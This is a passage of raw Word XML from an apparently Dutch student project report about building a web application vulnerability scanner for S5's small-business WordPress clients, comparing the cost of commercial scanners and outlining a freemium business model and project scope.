        <w:t xml:space="preserve"> Probleemstelling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A774DE0" w14:textId="55F4175D" w:rsidR="006822D8" w:rsidRDefault="006822D8" w:rsidP="006822D8">
      <w:r>
        <w:t>In recent</w:t>
      </w:r>
      <w:r w:rsidR="001B4D94">
        <w:t xml:space="preserve"> onderzoek is gebleken dat CMS-</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00F26270">
        <w:t>ystemen als WordPress</w:t>
      </w:r>
      <w:r w:rsidR="001B3BF4">
        <w:t xml:space="preserve"> een </w:t>
      </w:r>
      <w:r w:rsidR="00B607E3">
        <w:t>aantrekkelijk</w:t>
      </w:r>
      <w:r w:rsidR="009170D1">
        <w:t xml:space="preserve"> doelwit is</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> voor hacker</w:t>
      </w:r>
      <w:r w:rsidR="00B607E3">
        <w:t>s. Er zijn hier twee redenen voor.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 27% van alle website</w:t>
      </w:r>
      <w:r w:rsidR="00B607E3">
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:t>, wat een ongeveer 1 miljard is, wordt aangedreven d</w:t>
      </w:r>
      <w:r w:rsidR="001B4D94">
        <w:t>oor het WordPress CMS-</w:t>
      </w:r>
      <w:r w:rsidR="00AD30F1">
        <w:t>platform</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Dit betekent dat wanneer er een nieuwe </w:t>
      </w:r>
      <w:r w:rsidR="00BA3A1A">
        <w:t>kwetsbaarheid gevonden wordt de kans bestaat dat</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> er meer dan 200 miljoen websites in gevaar lope</w:t>
      </w:r>
      <w:r w:rsidR="002E2A12">
        <w:t>n voor cyberaanvallen. De tweede</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> reden is </w:t>
      </w:r>
      <w:r w:rsidR="002E2A12">
        <w:t>dat WordPress extensies gebruiken</w:t>
      </w:r>
      <w:r w:rsidR="001325AC">
        <w:t>. D</w:t>
      </w:r>
      <w:r>
        <w:t>eze worden ontwikkeld door derde partijen, sterker no</w:t>
      </w:r>
      <w:r w:rsidR="001B4D94">
        <w:t>g iedereen met WordPress en PHP-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">kennis zou een extensies </w:t>
      </w:r>
      <w:r w:rsidR="00943118">
        <w:t xml:space="preserve">kunnen </w:t>
      </w:r>
      <w:r w:rsidR="001325AC">
        <w:t>maken en publiceren op de e</w:t>
      </w:r>
      <w:r>
        <w:t>xtensie markt van WordPress.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D3A5A0" w14:textId="0062804F" w:rsidR="00581B17" w:rsidRDefault="001B4D94" w:rsidP="006822D8">
      <w:r>
        <w:t>Het zou ideaal zijn als website-</w:t>
      </w:r>
      <w:r w:rsidR="006822D8">
        <w:t>eigenaren</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="006822D8">
        <w:t xml:space="preserve"> in het specifiek de klanten </w:t>
      </w:r>
      <w:r>
        <w:t>van S5 inzicht zouden krijgen in</w:t>
      </w:r>
      <w:r w:rsidR="006822D8">
        <w:t xml:space="preserve"> de kwetsbaarheden van hu</w:t>
      </w:r>
      <w:r w:rsidR="002F7302">
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> website</w:t>
      </w:r>
      <w:r w:rsidR="002F7302">
        <w:t>. Informatie als onveilige inputvelden</w:t>
      </w:r>
      <w:r w:rsidR="006822D8">
        <w:t xml:space="preserve"> en misconfiguraties van de webserver</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of website</w:t>
      </w:r>
      <w:r w:rsidR="006822D8">
        <w:t xml:space="preserve"> kunnen de </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">website-eigenaren </w:t>
      </w:r>
      <w:r w:rsidR="008F319B">
        <w:t>inz</w:t>
      </w:r>
      <w:r>
        <w:t>icht bieden in welke risico’s</w:t>
      </w:r>
      <w:r w:rsidR="008F319B">
        <w:t xml:space="preserve"> hun webapplicaties lopen</w:t>
      </w:r>
      <w:r w:rsidR="006822D8">
        <w:t xml:space="preserve">. Het eerste probleem waar al </w:t>
      </w:r>
      <w:r w:rsidR="00EA4198">
        <w:t>een oplossing voor is bedacht is:</w:t>
      </w:r>
      <w:r w:rsidR="006822D8">
        <w:t xml:space="preserve"> hoe kan </w:t>
      </w:r>
      <w:r>
        <w:t>S5 ervoor zorgen dat de website-eigenaren</w:t>
      </w:r>
      <w:r w:rsidR="006822D8">
        <w:t xml:space="preserve"> inzichtelijke informa</w:t>
      </w:r>
      <w:r w:rsidR="00733DA6">
        <w:t>tie kunnen</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> verkrijgen over de beveiliging</w:t>
      </w:r>
      <w:r w:rsidR="00733DA6">
        <w:t>status van hun website</w:t>
      </w:r>
      <w:r w:rsidR="006822D8">
        <w:t xml:space="preserve">. De oplossing voor deze </w:t>
      </w:r>
      <w:r w:rsidR="00A46B59">
        <w:t>vraagstelling</w:t>
      </w:r>
      <w:r w:rsidR="006822D8">
        <w:t xml:space="preserve"> is ook tevens de aanleiding van mijn opdracht het onderzoeken en bouwen van een </w:t>
      </w:r>
      <w:r w:rsidR="00650BF0">
        <w:t>webapplicatie scanner</w:t>
      </w:r>
      <w:r w:rsidR="004429E0">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="006822D8">
        <w:t xml:space="preserve"> wat zal moeten dienen als een Proof of Concept.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255DE049" w14:textId="3FEAE915" w:rsidR="00581B17" w:rsidRDefault="00CA3133" w:rsidP="00EE0925">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>Business leads en gratis scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BAC16EC" w14:textId="6E390085" w:rsidR="006822D8" w:rsidRDefault="006822D8" w:rsidP="006822D8">
      <w:r>
        <w:t xml:space="preserve">De klanten van S5 zijn </w:t>
      </w:r>
      <w:r w:rsidR="00186B88">
        <w:t>over het algemeen MKB-website</w:t>
      </w:r>
      <w:r>
        <w:t>ondernemers en doen daarom hun best om een goede klantenservice te bieden. Maar wat als een hacker er vandoor gaat met d</w:t>
      </w:r>
      <w:r w:rsidR="00A54519">
        <w:t>e klantgegevens heeft de website</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> dan nog recht om klantenservice hoog in het vaandel te zetten? Wat kan hier</w:t>
      </w:r>
      <w:r w:rsidR="00087C96">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>tegen gedaan wo</w:t>
      </w:r>
      <w:r w:rsidR="0066007A">
        <w:t>rden?</w:t>
      </w:r>
      <w:r w:rsidR="00A54519">
        <w:t xml:space="preserve"> In het algemeen kan een website-</w:t>
      </w:r>
      <w:r>
        <w:t>eigenaar</w:t>
      </w:r>
      <w:r w:rsidR="006D721F">
        <w:t xml:space="preserve"> veiligheidsmaatregelingen</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A54519">
        <w:t>nemen om de website</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> beter te bev</w:t>
      </w:r>
      <w:r w:rsidR="00A54519">
        <w:t xml:space="preserve">eiligen. Hiervoor kan </w:t>
      </w:r>
      <w:r w:rsidR="006D721F">
        <w:t>er contact opgenomen worden met een cyber security</w:t>
      </w:r>
      <w:r>
        <w:t>bedrijf dat consultancy aanbiedt</w:t>
      </w:r>
      <w:r w:rsidR="001130BA">
        <w:t>, dit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> kan hoog in de kost</w:t>
      </w:r>
      <w:r w:rsidR="00A54519">
        <w:t>en lopen. MKB-website</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hebben het al moeilijk genoeg</w:t>
      </w:r>
      <w:r w:rsidR="00C56ECD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B646E0">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00B646E0" w:rsidRPr="00B646E0">
        <w:t>mkbservicedesk</w:t>
      </w:r>
      <w:r w:rsidR="006D721F">
        <w:t>.nl, p</w:t>
      </w:r>
      <w:r w:rsidR="00B646E0">
        <w:t>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same day delivery, die</w:t>
      </w:r>
      <w:r w:rsidR="0083526B">
        <w:t xml:space="preserve"> voor</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MKB-bedrijven in financiële en logistieke opzicht lastig te realiseren zijn. Een web security scan kan in de duizende</w:t>
      </w:r>
      <w:r w:rsidR="003229E0">
        <w:t>n euro’s lopen wat menig website-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">eigenaren als een overbodige kostenpost zien en ik geef ze tot een bepaalde hoogte wel gelijk maar als een hacker </w:t>
      </w:r>
      <w:r w:rsidR="003229E0">
        <w:t>jouw website</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> in het vizier heeft dan is de vraag nog hoeveel sc</w:t>
      </w:r>
      <w:r w:rsidR="003229E0">
        <w:t xml:space="preserve">hade er zal worden toe </w:t>
      </w:r>
      <w:r w:rsidR="009C1B75">
        <w:t>gericht.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC36276" w14:textId="77777777" w:rsidR="00D371DB" w:rsidRDefault="00D371DB" w:rsidP="006822D8"/>
    <w:p w14:paraId="14A53C7C" w14:textId="77777777" w:rsidR="00D371DB" w:rsidRDefault="00D371DB" w:rsidP="006822D8"/>
    <w:p w14:paraId="220E1EF1" w14:textId="77777777" w:rsidR="00D371DB" w:rsidRDefault="00D371DB" w:rsidP="006822D8"/>
    <w:p w14:paraId="73F83559" w14:textId="4529D565" w:rsidR="006822D8" w:rsidRDefault="006822D8" w:rsidP="006822D8">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">De website sectoolmarket.com, een vergelijking website voor </w:t>
      </w:r>
      <w:r w:rsidR="00650BF0">
        <w:t>webapplicatie scanners</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, heeft in 2016 een lijst gepubliceerd met informatie over de prijzen en features van de meeste gebruikte </w:t>
      </w:r>
      <w:r w:rsidR="00650BF0">
        <w:t>webapplicatie scanners</w:t>
      </w:r>
      <w:r>
        <w:t>. Ik heb naar de 15 commerciële producten gekeken en daar de drie duurste uitgekozen. Ik heb tevens ook naar de open-source producten gekeken</w:t>
      </w:r>
      <w:r w:rsidR="00A153B5">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hie</w:t>
      </w:r>
      <w:r w:rsidR="00350387">
        <w:t>rvan waren er 49, een zeer groot</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> aanbod. Het probleem hiermee is dat zij zeer </w:t>
      </w:r>
      <w:r w:rsidR="00BD5AD1">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253341696" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="59DBF0C7" wp14:editId="26E72BF8">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-898525</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-712139</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="481" name="Rectangle 48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DDFBE" id="Rectangle 481" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.75pt;margin-top:-56pt;width:25pt;height:1031.7pt;z-index:-2499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" fillcolor="#c5e0b3 [1305]" strokecolor="#c5e1b4" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00350387">
        <w:t>beperkt zijn in hun scan</w:t>
      </w:r>
      <w:r>
        <w:t>opties en niet specifiek zijn gericht op de do</w:t>
      </w:r>
      <w:r w:rsidR="007A3716">
        <w:t>elgroep van S5. Ook is het zo dat het</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> zeer lasti</w:t>
      </w:r>
      <w:r w:rsidR="00443F70">
        <w:t xml:space="preserve">g om deze open-source producten te integreren </w:t>
      </w:r>
      <w:r w:rsidR="00350387">
        <w:t>in een test</w:t>
      </w:r>
      <w:r>
        <w:t>omgeving</w:t>
      </w:r>
      <w:r w:rsidR="00350387">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> omdat er</w:t>
      </w:r>
      <w:r w:rsidR="00350387">
        <w:t xml:space="preserve"> in de meeste gevallen</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> niet genoeg aa</w:t>
      </w:r>
      <w:r w:rsidR="00350387">
        <w:t>ndacht</w:t>
      </w:r>
      <w:r w:rsidR="005E3E9C">
        <w:t xml:space="preserve"> besteed</w:t>
      </w:r>
      <w:r w:rsidR="00350387">
        <w:t xml:space="preserve"> wordt</w:t>
      </w:r>
      <w:r w:rsidR="005E3E9C">
        <w:t xml:space="preserve"> aan het</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A46B59">
        <w:t>integratieproces</w:t>
      </w:r>
      <w:r w:rsidR="00F25403">
        <w:t xml:space="preserve"> van het product</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> oftewel deploy</w:t>
      </w:r>
      <w:r w:rsidR="00EF00E1">
        <w:t>ment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14237A77" w14:textId="3964FE34" w:rsidR="006822D8" w:rsidRDefault="006822D8" w:rsidP="006822D8">
      <w:r>
        <w:t>Bedrijven als IBM, Acunetix, Netsparker bieden de commerciële producten aan en hebben daarmee ook de hoogste kostenp</w:t>
      </w:r>
      <w:r w:rsidR="00350387">
        <w:t xml:space="preserve">laatje als het gaat om diensten of </w:t>
      </w:r>
      <w:r>
        <w:t>producten zoals consultancy en enterprise applicaties maar in vergelijking met de open-source applicaties bieden zij meer features aan en zijn de applicaties veel accurater als het neer komt op het scannen naar kwetsbaarheden.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4-Accent6"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1342"/>
        <w:gridCol w:w="3422"/>
        <w:gridCol w:w="2453"/>
        <w:gridCol w:w="1843"/>
      </w:tblGrid>
      <w:tr w:rsidR="006822D8" w14:paraId="06280EBD" w14:textId="77777777" w:rsidTr="0070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301DE6B2" w14:textId="77777777" w:rsidR="006822D8" w:rsidRDefault="006822D8" w:rsidP="00624219">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Commerciële producten</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006822D8" w14:paraId="69718CA2"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9CA147E" w14:textId="77777777" w:rsidR="006822D8" w:rsidRDefault="006822D8" w:rsidP="00624219">
            <w:r>
              <w:t>Naam</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3423" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="68810993"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Features</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2454" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39594A82"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consultancy per jaar</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1843" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="318C2B9A"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applicatie</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006822D8" w14:paraId="07B06147"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442D0CF3" w14:textId="77777777" w:rsidR="006822D8" w:rsidRDefault="006822D8" w:rsidP="00624219">
            <w:r>
              <w:t>IBM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3423" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F56A7EA"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SQLi, XSS, file inclusion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2454" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A746320"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 xml:space="preserve">17700$ </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1843" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E0B6F0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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006822D8" w14:paraId="5CCA2244"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4909792" w14:textId="77777777" w:rsidR="006822D8" w:rsidRDefault="006822D8" w:rsidP="00624219">
            <w:r>
              <w:t>Acunetix</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3423" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0A13670D"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SQLi, XSS, file inclusion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2454" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="25651B3E"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3500$</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1843" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="32D2D1DF"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2495$</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006822D8" w14:paraId="2A3DD749"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519164C4" w14:textId="77777777" w:rsidR="006822D8" w:rsidRDefault="006822D8" w:rsidP="00624219">
            <w:r>
              <w:t>Netsparker</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3423" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51D399C7"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SQLi, XSS, file inclusion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2454" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3DBF5AA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c>
          <w:tcPr>
            <w:tcW w:w="1843" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7106BAEC"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r>
    </w:tbl>
    <w:p w14:paraId="2178E68F" w14:textId="10A76C08" w:rsidR="006822D8" w:rsidRPr="009D389F" w:rsidRDefault="005810B6" w:rsidP="006822D8">
      <w:pPr>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E51AA4">
        <w:t>Tabel 1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39E5638E" w14:textId="7A5D0311" w:rsidR="006B3C0E" w:rsidRDefault="005810B6" w:rsidP="006822D8">
      <w:r>
        <w:t>In tabel</w:t>
      </w:r>
      <w:r w:rsidR="008D7A45">
        <w:t xml:space="preserve"> 1.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006822D8">
        <w:t>zie je h</w:t>
      </w:r>
      <w:r w:rsidR="0009250A">
        <w:t>oe hoog de kosten kunnen zijn,</w:t>
      </w:r>
      <w:r w:rsidR="006822D8">
        <w:t xml:space="preserve"> open-source applicatie zijn</w:t>
      </w:r>
      <w:r w:rsidR="0096493E">
        <w:t xml:space="preserve"> daarentegen</w:t>
      </w:r>
      <w:r w:rsidR="006822D8">
        <w:t xml:space="preserve"> gratis te gebruiken maar vergen veel techn</w:t>
      </w:r>
      <w:r w:rsidR="0011004F">
        <w:t>ische kennis. Nu zou een website-</w:t>
      </w:r>
      <w:r w:rsidR="006822D8">
        <w:t>eigenaar een opensource applicatie kunnen aanschaffen m</w:t>
      </w:r>
      <w:r w:rsidR="002A4FCA">
        <w:t xml:space="preserve">aar, dan is de vraag nog of hij of </w:t>
      </w:r>
      <w:r w:rsidR="006822D8">
        <w:t>zij in</w:t>
      </w:r>
      <w:r w:rsidR="005C71AD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006822D8">
        <w:t xml:space="preserve">staat is om een succesvolle implementatie in de praktijk te brengen. Wat er hoogstwaarschijnlijk gaat gebeuren is dat er een expert wordt ingehuurd om alles op te zetten, ook dit kan hoge kosten opleveren. </w:t>
      </w:r>
      <w:r w:rsidR="006617AF">
        <w:t>S5 wilt hier wat aa</w:t>
      </w:r>
      <w:r w:rsidR="007355A2">
        <w:t xml:space="preserve">n doen door </w:t>
      </w:r>
      <w:r w:rsidR="00CA3133">
        <w:t>een webapplicatie scanner aan te bieden</w:t>
      </w:r>
      <w:r w:rsidR="004B5113">
        <w:t xml:space="preserve"> waarvan het standaardaccount </w:t>
      </w:r>
      <w:r w:rsidR="00CA3133">
        <w:t>kosteloos is voor iedereen</w:t>
      </w:r>
      <w:r w:rsidR="004B5113">
        <w:t>, de</w:t>
      </w:r>
      <w:r w:rsidR="009E264C">
        <w:t>ze is gelimiteerd in opties. V</w:t>
      </w:r>
      <w:r w:rsidR="004B5113">
        <w:t xml:space="preserve">oor de betalende klant </w:t>
      </w:r>
      <w:r w:rsidR="009E264C">
        <w:t>is er een premiumaccount</w:t>
      </w:r>
      <w:r w:rsidR="00BD227B">
        <w:t xml:space="preserve"> verkrijgbaar</w:t>
      </w:r>
      <w:r w:rsidR="009E264C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004B5113">
        <w:t>die over alle opties beschikt. De klanten die een website laten bouwen bij S5 kunnen gratis upgrade</w:t>
      </w:r>
      <w:r w:rsidR="00132EB0">
        <w:t>n naar een premiumaccount.</w:t>
      </w:r>
      <w:r w:rsidR="00564C1C">
        <w:t xml:space="preserve"> Deze verdien</w:t>
      </w:r>
      <w:r w:rsidR="009A6538">
        <w:t>model is gebaseerd op het idee om het product voor iedereen beschikbaar te maken, wat zal leiden</w:t>
      </w:r>
      <w:r w:rsidR="009E264C">
        <w:t xml:space="preserve"> tot meer business leads en een uitbreiding</w:t>
      </w:r>
      <w:r w:rsidR="0035112C">
        <w:t xml:space="preserve"> van</w:t>
      </w:r>
      <w:r w:rsidR="009A6538">
        <w:t xml:space="preserve"> de service</w:t>
      </w:r>
      <w:r w:rsidR="009E264C">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="009A6538">
        <w:t xml:space="preserve"> richting security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A5240C" w14:textId="77777777" w:rsidR="006B3C0E" w:rsidRDefault="006B3C0E">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="21431F11" w14:textId="2A97BA6F" w:rsidR="00C44A00" w:rsidRDefault="00191C76" w:rsidP="006822D8">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="253164544" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="268163FA" wp14:editId="51CBE9E0">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>-900430</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-895985</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="317500" cy="13102731"/>
                <wp:effectExtent l="0" t="0" r="38100" b="29210"/>
                <wp:wrapNone/>
                <wp:docPr id="770" name="Rectangle 77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5891E" id="Rectangle 770" o:spid="_x0000_s1026" style="position:absolute;margin-left:-70.9pt;margin-top:-70.5pt;width:25pt;height:1031.7pt;z-index:-2501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" fillcolor="#c5e0b3 [1305]" strokecolor="#c5e1b4" strokeweight="1pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F202C5C" w14:textId="57006678" w:rsidR="006822D8" w:rsidRPr="006D01D5" w:rsidRDefault="006822D8" w:rsidP="00354798">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">1.3 </w:t>
      </w:r>
      <w:r w:rsidRPr="006D01D5">
        <w:t>Scope</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCE00BE" w14:textId="2057A92B" w:rsidR="00871F63" w:rsidRDefault="006822D8">
      <w:r>
        <w:t xml:space="preserve">Omdat ik mij zal </w:t>
      </w:r>
      <w:r w:rsidR="00A46B59">
        <w:t>bezighouden</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> met het ontwikkelen van een Minimal Viable Product (MVP) zal ik het project moeten afbakenen. Een </w:t>
      </w:r>
      <w:r w:rsidR="00F233F7">
        <w:t>w</w:t>
      </w:r>
      <w:r w:rsidR="00650BF0">
        <w:t>ebapplicatie scanner</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">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w:t>
      </w:r>
      <w:r w:rsidR="00B65DB6">
        <w:t xml:space="preserve"> context van het project, wat</w:t>
      </w:r>
      <w:r w:rsidR="009D58A4">
        <w:t xml:space="preserve"> het </w:t>
      </w:r>
      <w:r w:rsidR="00B65DB6">
        <w:t xml:space="preserve">zakelijke </w:t>
      </w:r>
      <w:r w:rsidR="009D58A4">
        <w:t>doel</w:t>
      </w:r>
      <w:r w:rsidR="00B65DB6">
        <w:t xml:space="preserve"> beschrijft</w:t>
      </w:r>
      <w:r w:rsidR="009D58A4">
        <w:t xml:space="preserve"> van dit project</w:t>
      </w:r>
      <w:r w:rsidR="007C1638">
        <w:t>, de</w:t>
      </w:r>
      <w:r w:rsidR="009D58A4">
        <w:t xml:space="preserv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w:t>
      </w:r>
      <w:r w:rsidR="000E4C38">
        <w:t>den als zero-day kwetsba</w:t>
      </w:r>
      <w:r w:rsidR="00095D69">
        <w:t>arheden.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BF8A242" w14:textId="78AD3D27" w:rsidR="00527D27" w:rsidRDefault="00527D27" w:rsidP="006822D8"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="GridTable4-Accent6"/>
        <w:tblW w:w="9915" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1887"/>
        <w:gridCol w:w="8028"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BB67B2" w14:paraId="082AB34A" w14:textId="77777777" w:rsidTr="00A5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tcPr>
          <w:p w14:paraId="5E9B5578" w14:textId="39389926" w:rsidR="00BB67B2" w:rsidRDefault="00BB67B2" w:rsidP="00BB67B2">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Project Scope</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A55164" w14:paraId="64815B40" w14:textId="77777777" w:rsidTr="00A55164">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887" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="692CD76D" w14:textId="3437A623" w:rsidR="00BB67B2" w:rsidRDefault="008F6BE5" w:rsidP="006822D8">
            <w:r>
              <w:t>Project aanleiding</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8028" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="78515D9D" w14:textId="16D0BF9E" w:rsidR="00BB67B2" w:rsidRDefault="008E6F5C" w:rsidP="006822D8">
            <w:pPr>
              <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>S5 wilt met een webapplicatie scanner kwetsbaarheden aantonen</w:t>
            </w:r>
            <w:r w:rsidR="00570510">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="000C2821">
              <w:t>om de klanten</w:t>
            </w:r>
            <w:r w:rsidR="00C1664E">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="002C2641">
              <w:t>meer inzicht te bieden</w:t>
            </w:r>
            <w:r w:rsidR="007805D9">
              <w:t xml:space="preserve"> op de security</w:t>
            </w:r>
            <w:r w:rsidR="002C2641">
              <w:t xml:space="preserve">status van hun website. </w:t>
            </w:r>
